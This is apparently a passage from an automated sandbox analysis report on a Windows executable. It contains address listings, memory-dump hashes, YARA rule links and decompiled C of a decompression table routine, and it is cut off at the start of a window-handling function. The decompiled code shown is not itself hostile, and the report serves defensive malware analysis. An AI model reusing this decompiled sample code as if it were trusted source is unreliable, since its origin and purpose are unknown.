                    0x004065d3
                    0x004065d6
                    0x004065d8
                    0x004065de
                    0x004065e0
                    0x004065e2
                    0x004065e4
                    0x004065e6
                    0x004065e9
                    0x004065f2
                    0x004065f5
                    0x004065f5
                    0x004065eb
                    0x004065eb
                    0x004065ee
                    0x004065ee
                    0x004065e9
                    0x004065e0
                    0x004065f7
                    0x004065f9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004065f9
                    0x00406578
                    0x00406578
                    0x0040657e
                    0x00406584
                    0x00406586
                    0x00000000
                    0x00000000
                    0x00406588
                    0x00406588
                    0x0040658a
                    0x0040658c
                    0x00406595
                    0x00406595
                    0x0040658e
                    0x0040658e
                    0x00406591
                    0x00406591
                    0x00406597
                    0x00406599
                    0x00000000
                    0x00000000
                    0x004065ff
                    0x004065ff
                    0x00406604
                    0x00406606
                    0x00406607
                    0x00406608
                    0x00406609
                    0x0040660f
                    0x00406612
                    0x00406615
                    0x00406618
                    0x0040661a
                    0x00406620
                    0x00406620
                    0x00406623
                    0x00406623
                    0x00406623
                    0x00406623
                    0x0040662c
                    0x00000000
                    0x00000000
                    0x00406631
                    0x00406631
                    0x00406634
                    0x00406637
                    0x00406639
                    0x004066d0
                    0x004066d0
                    0x004066d3
                    0x004066d5
                    0x004066d6
                    0x004066d7
                    0x004066da
                    0x00000000
                    0x004066da
                    0x0040663f
                    0x0040663f
                    0x00406645
                    0x00406647
                    0x0040666c
                    0x0040666f
                    0x00406675
                    0x0040667a
                    0x00406680
                    0x00406686
                    0x00406688
                    0x0040668b
                    0x00406694
                    0x0040669a
                    0x0040669a
                    0x0040668d
                    0x0040668f
                    0x00406691
                    0x00406691
                    0x0040669c
                    0x004066a2
                    0x004066a4
                    0x004066a7
                    0x004066a9
                    0x004066af
                    0x004066b1
                    0x004066b3
                    0x004066b5
                    0x004066b7
                    0x004066ba
                    0x004066c3
                    0x004066c6
                    0x004066c6
                    0x004066bc
                    0x004066bc
                    0x004066bf
                    0x004066bf
                    0x004066ba
                    0x004066b1
                    0x004066c8
                    0x004066ca
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066ca
                    0x00406649
                    0x00406649
                    0x0040664f
                    0x00406655
                    0x00406657
                    0x00000000
                    0x00000000
                    0x00406659
                    0x00406659
                    0x0040665b
                    0x0040665d
                    0x00406664
                    0x00406664
                    0x00406666
                    0x0040665f
                    0x0040665f
                    0x00406661
                    0x00406661
                    0x00406668
                    0x0040666a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066e2
                    0x004066e2
                    0x004066e5
                    0x004066e7
                    0x004066ea
                    0x004066ed
                    0x004066ed
                    0x004066ed
                    0x004066ed
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405d9b
                    0x00405d7f
                    0x00000000
                    0x00405d85
                    0x00405d88
                    0x00405d92
                    0x00405d95
                    0x00405d98
                    0x00000000
                    0x00405d98
                    0x00405d7f
                    0x00405da3
                    0x00405da6
                    0x00405daa
                    0x00405db4
                    0x00405dbe
                    0x00405dc1
                    0x00405dc7
                    0x00405efb
                    0x00405efd
                    0x00405f03
                    0x00405f06
                    0x00405f09
                    0x00000000
                    0x00405f09
                    0x00405dcd
                    0x00405dcd
                    0x00405dce
                    0x00405e26
                    0x00405e26
                    0x00405e2d
                    0x00405ed3
                    0x00405ed3
                    0x00405ed8
                    0x00405edb
                    0x00405ee0
                    0x00405ee3
                    0x00405ee8
                    0x00405eeb
                    0x00405ef0
                    0x00405ef3
                    0x00405ef3
                    0x00000000
                    0x00405e33
                    0x00405e33
                    0x00405e33
                    0x00405e33
                    0x00405e37
                    0x00405e37
                    0x00405e59
                    0x00405e5c
                    0x00405e5e
                    0x00405e61
                    0x00405e66
                    0x00405e3c
                    0x00405e3c
                    0x00405e41
                    0x00405e43
                    0x00405e45
                    0x00405e4a
                    0x00405e50
                    0x00405e55
                    0x00405e57
                    0x00405e57
                    0x00405e4c
                    0x00405e4c
                    0x00405e4c
                    0x00405e4a
                    0x00000000
                    0x00405e68
                    0x00405e95
                    0x00405e9a
                    0x00405e9c
                    0x00405e9d
                    0x00405e9f
                    0x00405ea0
                    0x00405ea0
                    0x00405ea0
                    0x00405ec8
                    0x00405ecd
                    0x00405ecd
                    0x00000000
                    0x00405ecd
                    0x00405e66
                    0x00405e2d
                    0x00405dd0
                    0x00405dd0
                    0x00405dd1
                    0x00405e1b
                    0x00000000
                    0x00405e1b
                    0x00405dd3
                    0x00405dd4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405f30
                    0x00405f30
                    0x00405f30
                    0x00405f33
                    0x00000000
                    0x00000000
                    0x00405f10
                    0x00405f10
                    0x00405f14
                    0x00000000
                    0x00000000
                    0x00405f1a
                    0x00405f1a
                    0x00405f1d
                    0x00405f20
                    0x00405f25
                    0x00405f27
                    0x00405f2a
                    0x00405f2d
                    0x00405f2d
                    0x00405f2d
                    0x00405f35
                    0x00405f35
                    0x00405f38
                    0x00405f3a
                    0x00405f3f
                    0x00405f42
                    0x00405f44
                    0x00405f47
                    0x00000000
                    0x00000000
                    0x00405f4d
                    0x00405f4d
                    0x00405f4f
                    0x00000000
                    0x00000000
                    0x00405f55
                    0x00405f55
                    0x00405f59
                    0x00000000
                    0x00000000
                    0x00405f5f
                    0x00405f5f
                    0x00405f62
                    0x00405f64
                    0x00406002
                    0x00406002
                    0x00406005
                    0x00406007
                    0x00406007
                    0x0040600a
                    0x0040600d
                    0x0040600f
                    0x00406011
                    0x00406013
                    0x00406013
                    0x0040601c
                    0x00406021
                    0x00406024
                    0x00406027
                    0x0040602a
                    0x0040602d
                    0x0040602d
                    0x0040602d
                    0x00406030
                    0x00406036
                    0x00406036
                    0x0040603c
                    0x0040603c
                    0x0040603c
                    0x00000000
                    0x00406030
                    0x00405f6a
                    0x00405f6a
                    0x00405f70
                    0x00405f73
                    0x00405f75
                    0x00405fa0
                    0x00405fa3
                    0x00405fa9
                    0x00405fae
                    0x00405fb4
                    0x00405fba
                    0x00405fbc
                    0x00405fbf
                    0x00405fc8
                    0x00405fce
                    0x00405fce
                    0x00405fc1
                    0x00405fc3
                    0x00405fc5
                    0x00405fc5
                    0x00405fd0
                    0x00405fd6
                    0x00405fd9
                    0x00405fdb
                    0x00405fdd
                    0x00405fe3
                    0x00405fe5
                    0x00405fe7
                    0x00405fea
                    0x00405ff3
                    0x00405ff3
                    0x00405ff5
                    0x00405fec
                    0x00405fec
                    0x00405fef
                    0x00405fef
                    0x00405ff7
                    0x00405ff7
                    0x00405fe5
                    0x00405ffa
                    0x00405ffc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405ffc
                    0x00405f77
                    0x00405f77
                    0x00405f7d
                    0x00405f83
                    0x00405f85
                    0x00000000
                    0x00000000
                    0x00405f87
                    0x00405f87
                    0x00405f89
                    0x00405f8b
                    0x00405f8e
                    0x00405f95
                    0x00405f95
                    0x00405f97
                    0x00405f90
                    0x00405f90
                    0x00405f92
                    0x00405f92
                    0x00405f99
                    0x00405f9b
                    0x00405f9e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004060a2
                    0x004060a5
                    0x004060a8
                    0x004060ae
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406285
                    0x00406285
                    0x00406285
                    0x00406288
                    0x0040628b
                    0x0040628d
                    0x00406290
                    0x00406296
                    0x0040629d
                    0x0040629f
                    0x00000000
                    0x00000000
                    0x00406173
                    0x00406173
                    0x0040619b
                    0x0040619b
                    0x0040619b
                    0x0040619d
                    0x00000000
                    0x00000000
                    0x0040617b
                    0x0040617b
                    0x0040617f
                    0x00000000
                    0x00000000
                    0x00406185
                    0x00406185
                    0x00406188
                    0x0040618b
                    0x0040618e
                    0x00406190
                    0x00406192
                    0x00406195
                    0x00406198
                    0x00406198
                    0x00406198
                    0x0040619f
                    0x0040619f
                    0x004061a7
                    0x004061aa
                    0x004061b0
                    0x004061b3
                    0x004061b7
                    0x004061bb
                    0x004061be
                    0x004061c1
                    0x004061d9
                    0x004061d9
                    0x004061dc
                    0x004061ea
                    0x004061ed
                    0x004061de
                    0x004061de
                    0x004061e0
                    0x004061e7
                    0x004061e7
                    0x00406216
                    0x00406216
                    0x00406216
                    0x00406219
                    0x0040621b
                    0x00000000
                    0x00000000
                    0x004061f6
                    0x004061f6
                    0x004061fa
                    0x00000000
                    0x00000000
                    0x00406200
                    0x00406200
                    0x00406203
                    0x00406206
                    0x00406209
                    0x0040620b
                    0x0040620d
                    0x00406210
                    0x00406213
                    0x00406213
                    0x00406213
                    0x0040621d
                    0x0040621d
                    0x0040621f
                    0x00406221
                    0x0040622c
                    0x0040622f
                    0x00406232
                    0x00406234
                    0x00406236
                    0x00406238
                    0x0040623b
                    0x0040623e
                    0x00406243
                    0x00406246
                    0x00406249
                    0x0040624c
                    0x00406253
                    0x00406256
                    0x00406258
                    0x00000000
                    0x00000000
                    0x0040625e
                    0x0040625e
                    0x00406262
                    0x00406273
                    0x00406273
                    0x00406273
                    0x00406275
                    0x00406275
                    0x00406279
                    0x00406279
                    0x00406279
                    0x0040627b
                    0x0040627c
                    0x0040627f
                    0x0040627f
                    0x0040627f
                    0x00406282
                    0x00000000
                    0x00406282
                    0x00406264
                    0x00406264
                    0x00406267
                    0x00000000
                    0x00000000
                    0x0040626d
                    0x0040626d
                    0x00000000
                    0x0040626d
                    0x004061c3
                    0x004061c3
                    0x004061c5
                    0x004061c7
                    0x004061ca
                    0x004061cd
                    0x004061d1
                    0x004061d1
                    0x004062a5
                    0x004062a5
                    0x004062a8
                    0x004062af
                    0x004062b3
                    0x004062b5
                    0x004062b8
                    0x004062bb
                    0x004062c0
                    0x004062c3
                    0x004062c5
                    0x004062c6
                    0x004062c9
                    0x004062d4
                    0x004062d7
                    0x004062ee
                    0x004062f3
                    0x004062fa
                    0x004062ff
                    0x00406303
                    0x00406305
                    0x00406305
                    0x00406305
                    0x00406308
                    0x0040630a
                    0x00000000
                    0x00406310
                    0x00406310
                    0x00406314
                    0x0040631f
                    0x00406332
                    0x00406337
                    0x0040633c
                    0x0040633e
                    0x00000000
                    0x00000000
                    0x00406344
                    0x00406344
                    0x00406347
                    0x00406349
                    0x00406357
                    0x00406357
                    0x0040635a
                    0x0040635a
                    0x0040635d
                    0x00406360
                    0x00406363
                    0x00406366
                    0x00406369
                    0x0040636c
                    0x00000000
                    0x0040636c
                    0x0040634b
                    0x0040634b
                    0x00406351
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406351
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066f0
                    0x004066f0
                    0x004066f6
                    0x004066fc
                    0x00406701
                    0x00406707
                    0x0040670d
                    0x0040670f
                    0x00406712
                    0x0040671b
                    0x00406721
                    0x00406721
                    0x00406714
                    0x00406716
                    0x00406718
                    0x00406718
                    0x00406723
                    0x00406725
                    0x00406728
                    0x00406763
                    0x00406763
                    0x00000000
                    0x0040672a
                    0x0040672a
                    0x0040672a
                    0x00406730
                    0x00406733
                    0x00406735
                    0x0040676a
                    0x0040676c
                    0x00000000
                    0x0040676c
                    0x00000000
                    0x00406735
                    0x00000000
                    0x00405d74
                    0x00406742
                    0x00000000
                    0x00406742
                    0x00406156
                    0x00406158
                    0x00000000
                    0x00000000
                    0x0040615a
                    0x0040615a
                    0x0040615d
                    0x00000000
                    0x0040615d
                    0x004060a2
                    0x00406063
                    0x00406747
                    0x0040674a
                    0x0040674c
                    0x00406755
                    0x0040675b
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                    • Instruction ID: e2ef9aa76577a7a1e17a70bef0141433c3d77918b2314780ae2ebb94a64f5d95
                    • Opcode Fuzzy Hash: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                    • Instruction Fuzzy Hash: D1E17B71900709DFDB28CF58C884BAAB7F5EB44305F15852FE896AB291D378AA51CF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1000CD87, Relevance: .3, Instructions: 331COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                    • Instruction ID: 03f688c33c67f0290e1fe47f283e22e9a8d4fea8297bf4afbb40a2ffb3a49bfd
                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                    • Instruction Fuzzy Hash: 3CC1523220969709EB5DC779C47453EBEE19BA26F1317076ED8B2CB1D8FF20C5649620
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1000C96F, Relevance: .3, Instructions: 323COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: f0d92eff914e3dec11437d5c0516f8cadc9e03df56e1f8f1d60125d8f2b443cb
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: 4BC1703220969709FB5DC739843583EBEE19BA26F1317076ED8B2CB1D8FF20D5649620
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040681A, Relevance: .3, Instructions: 300COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42cdf0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42cdf0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                    0x00406825
                    0x0040682d
                    0x00406831
                    0x00406833
                    0x00406836
                    0x00406838
                    0x00406838
                    0x0040683a
                    0x00406841
                    0x00406843
                    0x00406843
                    0x00406849
                    0x0040685e
                    0x00406866
                    0x00406868
                    0x0040686a
                    0x0040686d
                    0x0040686e
                    0x0040686e
                    0x00406874
                    0x00000000
                    0x00000000
                    0x00406876
                    0x00406879
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406879
                    0x0040687d
                    0x00406880
                    0x00406882
                    0x00406882
                    0x00406885
                    0x0040688b
                    0x0040688c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040688c
                    0x00406891
                    0x00406894
                    0x00406896
                    0x00406896
                    0x0040689c
                    0x0040689e
                    0x004068af
                    0x004068a2
                    0x004068a6
                    0x00406b4b
                    0x00000000
                    0x00406b4b
                    0x004068ac
                    0x004068ad
                    0x004068ad
                    0x004068b5
                    0x004068b8
                    0x004068bc
                    0x004068be
                    0x004068c0
                    0x004068c3
                    0x00000000
                    0x00000000
                    0x004068cb
                    0x004068d1
                    0x004068d3
                    0x004068d5
                    0x004068d6
                    0x004068eb
                    0x004068eb
                    0x004068ee
                    0x004068f0
                    0x004068f0
                    0x004068f2
                    0x004068f7
                    0x004068f9
                    0x00406900
                    0x00406902
                    0x0040690a
                    0x0040690a
                    0x0040690c
                    0x0040690d
                    0x0040691c
                    0x00406920
                    0x00406924
                    0x00406927
                    0x0040692a
                    0x0040692f
                    0x00406932
                    0x00406938
                    0x0040693f
                    0x00406945
                    0x00406b3e
                    0x00406b3e
                    0x00406b43
                    0x00406b52
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406b43
                    0x00406952
                    0x00406955
                    0x00406958
                    0x0040695b
                    0x0040695f
                    0x00000000
                    0x00000000
                    0x0040696a
                    0x0040696d
                    0x0040696e
                    0x00406970
                    0x00406976
                    0x00406979
                    0x00000000
                    0x00000000
                    0x0040697f
                    0x00406980
                    0x00406983
                    0x00406986
                    0x00406989
                    0x0040698f
                    0x00406991
                    0x00406991
                    0x00406999
                    0x0040699d
                    0x004069a2
                    0x004069c7
                    0x004069cd
                    0x004069cf
                    0x004069d1
                    0x004069d4
                    0x004069dd
                    0x00000000
                    0x00000000
                    0x004069a4
                    0x004069a4
                    0x004069ad
                    0x004069b1
                    0x00000000
                    0x00000000
                    0x004069c2
                    0x004069c2
                    0x004069c5
                    0x00000000
                    0x00000000
                    0x004069b5
                    0x004069b8
                    0x004069ba
                    0x004069be
                    0x00000000
                    0x00000000
                    0x004069c0
                    0x004069c0
                    0x00000000
                    0x004069c2
                    0x004069e6
                    0x004069ec
                    0x004069f6
                    0x004069f8
                    0x004069fd
                    0x004069ff
                    0x00406a35
                    0x00406a01
                    0x00406a01
                    0x00406a04
                    0x00406a07
                    0x00406a11
                    0x00406a14
                    0x00406a1b
                    0x00406a26
                    0x00406a2d
                    0x00406a2d
                    0x00406a37
                    0x00406a3a
                    0x00406a3c
                    0x00406a42
                    0x00406a42
                    0x00406a4b
                    0x00406a4e
                    0x00406a53
                    0x00406a62
                    0x00406a6a
                    0x00406a6f
                    0x00406a93
                    0x00406a9b
                    0x00406a9f
                    0x00406aa5
                    0x00406a71
                    0x00406a7f
                    0x00406a82
                    0x00406a88
                    0x00406a88
                    0x00406aa9
                    0x00406a64
                    0x00406a64
                    0x00406a64
                    0x00406aba
                    0x00406abe
                    0x00406aca
                    0x00406ac5
                    0x00406ac8
                    0x00406ac8
                    0x00406ad2
                    0x00406ad7
                    0x00406adf
                    0x00406adb
                    0x00406add
                    0x00406add
                    0x00406ae5
                    0x00406ae7
                    0x00406aee
                    0x00406af8
                    0x00406b02
                    0x00406b1e
                    0x00406b22
                    0x00406967
                    0x0040696d
                    0x0040696e
                    0x00406970
                    0x00406976
                    0x00406979
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406979
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406b04
                    0x00406b04
                    0x00406b04
                    0x00406b09
                    0x00406b12
                    0x00406b1b
                    0x00000000
                    0x00406b1b
                    0x00406b28
                    0x00406b28
                    0x00406b2b
                    0x00406b32
                    0x00406b35
                    0x00000000
                    0x00406958
                    0x004068d8
                    0x004068da
                    0x004068da
                    0x004068de
                    0x004068e1
                    0x004068e2
                    0x004068e2
                    0x00000000
                    0x004068da
                    0x0040684e
                    0x00406854
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                    • Instruction ID: 233014ff28be9fca5e40c1aeee1244862099a57bf12043c09a7623bfee50ec27
                    • Opcode Fuzzy Hash: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                    • Instruction Fuzzy Hash: D0C13B71A00259CBCF14DF68C4905EEB7B2FF99314F26826AD856B7380D734A952CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403E25, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
